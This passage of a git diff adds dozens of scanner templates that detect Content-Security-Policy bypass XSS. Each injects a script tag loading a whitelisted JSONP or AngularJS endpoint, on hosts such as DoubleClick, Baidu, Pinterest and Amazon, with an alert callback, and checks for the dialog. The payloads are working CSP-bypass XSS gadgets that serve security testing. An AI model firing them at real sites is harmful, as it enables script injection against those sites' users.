-        mode: single
-        fuzz:
-          - "{{injection}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "{{injection}}"
-
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
-
-      - type: word
-        part: content_security_policy
-        words:
-          - "ovoenergy.com"
-          - "script-src"
-        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml b/dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml
new file mode 100644
index 00000000000..311b106b35f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/page-gitlab-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: page-gitlab-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via GitLab Page
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,gitlab
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://page.gitlab.com/index.php/form/getForm?munchkinId=194-VVC-221&form=1077&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: page_gitlab_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "page_gitlab_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml b/dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml
new file mode 100644
index 00000000000..80d2ad8eaf0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/partner-googleadservices-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: partner-googleadservices-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Google Ad Services
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,google
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://partner.googleadservices.com/gampad/cookie.js?domain=x&callback=alert&client=ca-pub-3374367632700222"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: partner_googleadservices_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "partner_googleadservices_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml b/dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml
new file mode 100644
index 00000000000..b60606ee3e8
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/passport-baidu-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: passport-baidu-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Baidu Passport
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,baidu
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://passport.baidu.com/channel/unicast?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: passport_baidu_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "passport_baidu_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml
new file mode 100644
index 00000000000..bf5462ed712
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/pinterest-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: pinterest-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Pinterest API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,pinterest
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.pinterest.com/v1/urls/count.json?callback=alert&url=x"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: pinterest_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "pinterest_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml
new file mode 100644
index 00000000000..dedd42b0a36
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/pixel-mathtag-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: pixel-mathtag-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Mathtag Pixel
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,mathtag
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://pixel.mathtag.com/u/js?callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: pixel_mathtag_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "pixel_mathtag_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml
new file mode 100644
index 00000000000..00be5aedfa1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/pixel-quantserve-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: pixel-quantserve-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Quantserve Pixel
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,quantserve
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://pixel.quantserve.com/api/segments.json?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: pixel_quantserve_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "pixel_quantserve_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml
deleted file mode 100644
index 41d9793617f..00000000000
--- a/dast/vulnerabilities/xss/csp/pixplug-csp-xss.yaml
+++ /dev/null
@@ -1,46 +0,0 @@
-id: pixplug-csp-xss
-
-info:
-  name: Content-Security-Policy Bypass via PixPlug
-  author: DhiyaneshDK
-  severity: high
-  reference:
-    - https://github.com/honoki/CSPBypass/blob/c7e4344226a58d96ad16a99d4446f81cd663264e/data.tsv#L174C20-L174C106
-  metadata:
-    verified: true
-  tags: xss,csp-bypass,pixplug
-
-http:
-  - pre-condition:
-      - type: dsl
-        dsl:
-          - 'method == "GET"'
-
-    payloads:
-      injection:
-        - '<script src="https://visitor.pixplug.in/jsonp/getdata.php?callback=alert(1)"></script>'
-    fuzzing:
-      - part: query
-        type: replace
-        mode: single
-        fuzz:
-          - "{{injection}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "{{injection}}"
-
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
-
-      - type: word
-        part: content_security_policy
-        words:
-          - "pixplug.in"
-          - "script-src"
-        condition: and
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml b/dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml
new file mode 100644
index 00000000000..0c692aaaf92
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/portal-ayco-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: portal-ayco-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Ayco Portal
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ayco
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://portal.ayco.com/publicBundles/angularjs"></script><div ng-app><img src=x ng-on-error="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: portal_ayco_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "portal_ayco_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml b/dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml
new file mode 100644
index 00000000000..26b426bd4a0
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/pubads-doubleclick-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: pubads-doubleclick-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via DoubleClick PubAds
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,doubleclick
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://pubads.g.doubleclick.net/gampad/ads?gdfp_req=1&output=json_html&callback=alert&impl=fifs&json_a=1&iu_parts=4215%2Cimdb2.consumer.homepage&enc_prev_ius=%2F0%2F1%2C%2F0%2F1&prev_iu_szs=1008x150%7C1008x200%7C1008x30%7C970x250%7C9x1%2C300x250%7C11x1&cust_params=fv%3D1%26ab%3Df%26bpx%3D1%26c%3D1%26s%3D3075%252C32%26u%3D142752923777%26oe%3Dutf-8"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: pubads_doubleclick_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "pubads_doubleclick_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml b/dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml
new file mode 100644
index 00000000000..c811b857770
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/public-api-wordpress-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: public-api-wordpress-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via WordPress Public API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,wordpress
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://public-api.wordpress.com/rest/v1/sites/en.blog.wordpress.com/posts/?number=1&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: public_api_wordpress_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "public_api_wordpress_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml b/dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml
new file mode 100644
index 00000000000..3bb93b99944
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/qq-c-y-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: qq-c-y-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via QQ C.Y
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,qq
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://c.y.qq.com/v8/fcg-bin/v8.fcg?&notice=0&format=jsonp&channel=singer&page=list&jsonpCallback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: qq_c_y_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "qq_c_y_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml b/dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml
new file mode 100644
index 00000000000..9210b67e546
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/query-fqtag-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: query-fqtag-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via FQTag Query
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,fqtag
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://query.fqtag.com/b?callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: query_fqtag_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "query_fqtag_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml b/dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml
new file mode 100644
index 00000000000..fd7ebad2dca
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/r-skimresources-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: r-skimresources-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via SkimResources
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,skimresources
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://r.skimresources.com/api/?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: r_skimresources_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "r_skimresources_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml
new file mode 100644
index 00000000000..fe8581f1de9
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: raae2vza0snymz9cm3r8ix74bs71vdlz-edns-ip-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via IP-API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ip-api
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://raae2vza0snymz9cm3r8ix74bs71vdlz.edns.ip-api.com/json?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: raae2vza0snymz9cm3r8ix74bs71vdlz_edns_ip_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "raae2vza0snymz9cm3r8ix74bs71vdlz_edns_ip_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml b/dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml
new file mode 100644
index 00000000000..0519ecba6ea
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/recaptcha-net-csp-xss.yaml
@@ -0,0 +1 @@
+ 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml b/dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml
new file mode 100644
index 00000000000..0606cf67b78
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/rentokil-domains-firebaseio-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: rentokil-domains-firebaseio-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Firebase Rentokil Domains
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,firebase
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://rentokil-domains.firebaseio.com/.json?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: rentokil_domains_firebaseio_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "rentokil_domains_firebaseio_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml b/dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml
new file mode 100644
index 00000000000..25ede2d8606
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/reveal-clearbit-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: reveal-clearbit-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Clearbit Reveal
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,clearbit
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://reveal.clearbit.com/v1/companies/reveal?authorization=pk_5fdce9b9374f2f8a4f8c9f4a1546fa35&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: reveal_clearbit_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "reveal_clearbit_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ring-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ring-csp-xss.yaml
new file mode 100644
index 00000000000..f6b4f605b0f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ring-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ring-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Ring
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ring
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://ring.com/partials/consent/sv-SE/strings.json?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: ring_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "ring_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml b/dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml
new file mode 100644
index 00000000000..726cd34ef8e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/romania-amazon-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: romania-amazon-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Amazon Romania
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,amazon
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="https://romania.amazon.com/app/vendor.min.js"></script><input id=x ng-focus=$event.composedPath()|orderBy:\'(z=alert)(1)\'></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: romania_amazon_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "romania_amazon_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml b/dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml
new file mode 100644
index 00000000000..40c30ccda79
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/s-fqtag-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: s-fqtag-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via FQTag S
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,fqtag
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://s.fqtag.com/b?callback=alert(1)"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: s_fqtag_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "s_fqtag_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml b/dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml
new file mode 100644
index 00000000000..b71a6aef785
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/s-ytimg-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: s-ytimg-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via YTImg S
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ytimg
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="https://s.ytimg.com/yts/jslib/angular.min-vfl8oYsy-.js"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
